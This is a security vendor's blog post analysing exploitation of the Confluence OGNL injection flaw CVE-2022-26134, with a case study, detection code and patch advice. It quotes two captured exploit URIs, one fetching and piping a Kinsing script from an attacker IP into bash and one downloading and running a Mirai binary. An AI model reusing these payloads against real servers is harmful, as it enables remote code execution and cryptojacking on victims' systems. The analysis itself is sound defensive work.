Summary

- CVE-2022-26134 is an unauthenticated OGNL injection vulnerability that allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Center products (not Cloud).

- Atlassian has released several patches and a temporary mitigation in its security advisory, which has been updated regularly since the vulnerability emerged.

- Darktrace detected and responded to an instance of exploitation during the first weekend in which this CVE was widely exploited.

Introduction

Looking ahead to 2022, the security industry expressed widespread concerns around third-party exposure and integration vulnerabilities.[1] Having already seen a handful of in-the-wild exploits against the Spring Framework (CVE-2022-22965) and Microsoft (CVE-2022-30190), the start of June has now seen another critical remote code execution (RCE) vulnerability, this time affecting Atlassian’s Confluence range. Confluence is a popular wiki management and knowledge-sharing platform used by enterprises worldwide. This latest vulnerability (CVE-2022-26134) affects all supported versions of Confluence Server and Data Center.[2] This blog will explore the vulnerability itself, an instance which Darktrace detected and responded to, and additional guidance for both the public at large and existing Darktrace customers.

Exploitation of this CVE occurs through an injection vulnerability which enables threat actors to execute arbitrary code without authentication. Injection-type attacks work by sending crafted data to a web application so that it is interpreted as code rather than as input. In this instance, the attacker injects OGNL (Object-Graph Navigation Language) expressions into Confluence server memory, where they are evaluated. This is done by placing the expression in the URI of an HTTP request to the server. Threat actors can then plant a webshell, which they can interact with to deploy further malicious code without having to re-exploit the server. Several proofs-of-concept for this exploit have also been published online.[3] As a widely known, critical-severity vulnerability, it is being exploited indiscriminately by a range of threat actors.[4]
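Because the expression travels in the request URI, web or proxy logs are a natural place to look for it. The following is a minimal Python sketch of such a check, not a vendor signature: the function name, the regular expression and the token list are all assumptions chosen for illustration, and a determined attacker could evade them.

```python
import re
from urllib.parse import unquote

# Heuristic markers (assumptions for illustration, not an official signature).
OGNL_EXPRESSION = re.compile(r"\$\{.+\}", re.DOTALL)
SUSPICIOUS_TOKENS = (
    "java.lang.Runtime",
    "java.lang.ProcessBuilder",
    "javax.script.ScriptEngineManager",
    "@getRuntime",
)


def looks_like_ognl_injection(request_uri: str) -> bool:
    """Return True if the URI appears to carry an OGNL expression."""
    # Payloads are usually percent-encoded, sometimes more than once, so
    # decode repeatedly until the string stops changing (capped at 3 passes).
    decoded = request_uri
    for _ in range(3):
        next_pass = unquote(decoded)
        if next_pass == decoded:
            break
        decoded = next_pass

    # Require both a ${...} expression and a class name typical of
    # command-execution payloads, to reduce false positives.
    if not OGNL_EXPRESSION.search(decoded):
        return False
    return any(token in decoded for token in SUSPICIOUS_TOKENS)


if __name__ == "__main__":
    sample = "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/"
    print(looks_like_ognl_injection(sample))
    print(looks_like_ognl_injection("/display/SPACE/Home"))
```

Requiring two independent markers keeps ordinary Confluence paths from matching, at the cost of missing payloads that avoid the listed class names.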

Atlassian advises that sites hosted on Confluence Cloud (run via AWS) are not vulnerable to this exploit, which is restricted to organizations running their own Confluence servers.[2]

Case study: European media organization

The first detected in-the-wild exploit for this zero-day was reported to Atlassian as an out-of-hours attack over the US Memorial Day weekend.[5] Darktrace analysts identified a similar instance of this exploit only a couple of days later within the network of a European media provider. This was part of a wider series of compromises affecting the account, likely involving multiple threat actors. The timing was also in line with the start of more widespread public exploitation attempts against other organizations.[6]



On the evening of June 3, Darktrace’s Enterprise Immune System identified a new text/x-shellscript download by the curl/7.61.1 user agent on a company’s Confluence server. This originated from a rare external IP address, 194.38.20[.]166. It is possible that the initial compromise came moments earlier from 95.182.120[.]164 (a suspicious Russian IP), but this could not be verified as the connection was encrypted. The download was shortly followed by file execution and outbound HTTP involving the curl agent. A further download of an executable from 185.234.247[.]8 was attempted, but this was blocked by Antigena Network’s Autonomous Response. Despite this, the Confluence server then began making connections using the Minergate protocol on a non-standard port. The mining was accompanied by failed beaconing connections to another rare Russian IP, 45.156.23[.]210, which had not yet been flagged as malicious on VirusTotal OSINT (Figures 1 and 2).[7][8]



Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during Minergate activity and failed beaconing. Darktrace identified these IPs’ involvement in the Confluence exploit before any malicious ratings were added to the OSINT profiles

Minergate is an open crypto-mining pool allowing users to add computer hashing power to a larger network of mining devices in order to gain digital currencies. Interestingly, this is not the first time Confluence has had a critical vulnerability exploited for financial gain. September 2021 saw CVE-2021-26084, another RCE vulnerability which was also taken advantage of in order to install crypto-miners on unsuspecting devices.[9]

During attempted beaconing activity, Darktrace also highlighted the download of two cf.sh files using the initial curl agent. Further malicious files were then downloaded by the device. Enrichment from VirusTotal (Figure 3), alongside the URIs, identified these as Kinsing shell scripts.[10][11] Kinsing is a malware strain from 2020 which was predominantly used to install another crypto-miner named ‘kdevtmpfsi’. Antigena triggered a Suspicious File Block to mitigate the use of this miner. However, following these downloads, additional Minergate connection attempts continued to be observed. This may indicate the successful execution of one or more scripts.
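File enrichment of this kind usually keys on a hash of the downloaded file. As a rough illustration, the Python sketch below computes a SHA-256 digest and compares it with the two values that appear in the VirusTotal file URLs in footnotes 10 and 11. The function names are hypothetical, and an exact-hash match only catches unmodified copies of those specific files.

```python
import hashlib
from pathlib import Path

# SHA-256 values taken from the VirusTotal file URLs in footnotes 10 and 11.
KNOWN_KINSING_SHA256 = {
    "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a",
    "5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d",
}


def sha256_of_file(path: Path, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large files need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_known_kinsing_script(path: Path) -> bool:
    """Return True if the file's SHA-256 matches one of the footnoted hashes."""
    return sha256_of_file(path) in KNOWN_KINSING_SHA256
```

A call such as `is_known_kinsing_script(Path("cf.sh"))` would then flag a quarantined copy of either script; the path here is only an example.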





More concrete evidence of CVE-2022-26134 exploitation was detected on the afternoon of June 4. The Confluence server received an HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash').start()")}/

This is a likely demonstration of the OGNL injection attack (Figures 4 and 5). The ‘nashorn’ string refers to the Nashorn engine, which is used to interpret JavaScript code and has been identified within active payloads used to exploit this CVE. If successful, a threat actor could obtain a reverse shell, which eases continued connections and usually faces fewer restrictions on port usage.[12] Following the injection, the server showed more signs of compromise, such as continued crypto-mining and SSL beaconing attempts.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time



Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistence.

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
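Both request URIs quoted in this case study embed the address the server is told to download from, so they can be mined for indicators. The Python sketch below pulls `curl`/`wget` targets out of a decoded payload and writes them in the bracketed style used for IPs in this post. The regular expression and function names are assumptions for illustration and only cover IPv4 targets passed directly to those two tools.

```python
import re
from typing import List

# "curl" or "wget", any number of dash-prefixed options, then an IPv4
# address with an optional path. Hostnames and IPv6 are not handled.
FETCH_TARGET = re.compile(
    r"(?:curl|wget)\s+(?:-\S+\s+)*((?:\d{1,3}\.){3}\d{1,3})(/[^\s;|)'\"]*)?"
)


def defang(ip: str) -> str:
    """Bracket the final dot so the address is not clickable."""
    head, _, last = ip.rpartition(".")
    return f"{head}[.]{last}"


def extract_fetch_targets(payload: str) -> List[str]:
    """Return de-duplicated, defanged download targets in order of appearance."""
    targets: List[str] = []
    for ip, path in FETCH_TARGET.findall(payload):
        target = defang(ip) + path
        if target not in targets:
            targets.append(target)
    return targets


if __name__ == "__main__":
    kinsing = "(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash"
    mirai = "wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86"
    print(extract_fetch_targets(kinsing))
    print(extract_fetch_targets(mirai))
```

De-duplicating matters here because the first payload names the same script twice, once for `curl` and once as a `wget` fallback.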

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate connections and the suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often amounting to a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance



From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new ones. Models breached across kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

- Antigena / Network / External Threat / Antigena Suspicious Activity Block

  - Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour

- Antigena / Network / External Threat / Antigena Suspicious File Block

  - Block connections to 194.38.20[.]166 port 80 for two hours

- Antigena / Network / External Threat / Antigena Crypto Currency Mining Block

  - Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

- Ensure Antigena Network is deployed.

- Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).

- Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.

- Ensure Antigena has appropriate firewall integrations.

For each of these steps, more information can be found in the product guides on our Customer Portal.

Wider recommendations for CVE-2022-26134

On top of Darktrace product guidance, the vendor encourages several actions:

- Atlassian recommends updates to the following versions where this vulnerability has been fixed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.

- For those unable to update, temporary mitigations can be found in the formal security advisory.

- Ensure Internet-facing servers are up to date and follow secure compliance practices.
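The fixed releases listed above apply per release line, so a simple "greater than" comparison on the whole version string is not enough: 7.13.7 is fixed while 7.14.0 is not. The Python sketch below shows one way to check an installed version against that list. The function names are hypothetical, and treating release lines newer than 7.18 as fixed is an assumption that should be confirmed against Atlassian's advisory.

```python
from typing import Tuple

# Fixed releases from the recommendation above, keyed by (major, minor)
# release line with the first fixed patch number as the value.
FIXED_PATCH_BY_LINE = {
    (7, 4): 17,
    (7, 13): 7,
    (7, 14): 3,
    (7, 15): 2,
    (7, 16): 4,
    (7, 17): 4,
    (7, 18): 1,
}
NEWEST_FIXED_LINE = max(FIXED_PATCH_BY_LINE)


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse a three-part version such as '7.13.7'."""
    major, minor, patch = (int(part) for part in text.strip().split("."))
    return major, minor, patch


def has_fix(version: str) -> bool:
    """Return True if the version is at or beyond the fix for its release line."""
    major, minor, patch = parse_version(version)
    line = (major, minor)
    if line in FIXED_PATCH_BY_LINE:
        return patch >= FIXED_PATCH_BY_LINE[line]
    # Assumption: lines newer than 7.18 include the fix. Any other line
    # (for example 7.12.x) has no listed fix and is treated as unpatched.
    return line > NEWEST_FIXED_LINE


if __name__ == "__main__":
    for candidate in ("7.4.16", "7.13.7", "7.14.0", "7.18.1"):
        print(candidate, has_fix(candidate))
```

Servers on a release line with no listed fix would need to move to a fixed line or apply the temporary mitigations from the advisory.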

Appendix

Darktrace model detections (for the discussed incident)

- Anomalous Connection / New User Agent to IP Without Hostname

- Anomalous File / EXE from Rare External Location

- Anomalous File / Script from Rare External

- Anomalous Server Activity / Possible Denial of Service Activity

- Anomalous Server Activity / Rare External from Server

- Compromise / Crypto Currency Mining Activity

- Compromise / High Volume of Connections with Beacon Score

- Compromise / Large Number of Suspicious Failed Connections

- Compromise / SSL Beaconing to Rare Destination

- Device / New User Agent



IoCs

Thanks to Hyeongyung Yeom and the Threat Research Team for their contributions.

Footnotes

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134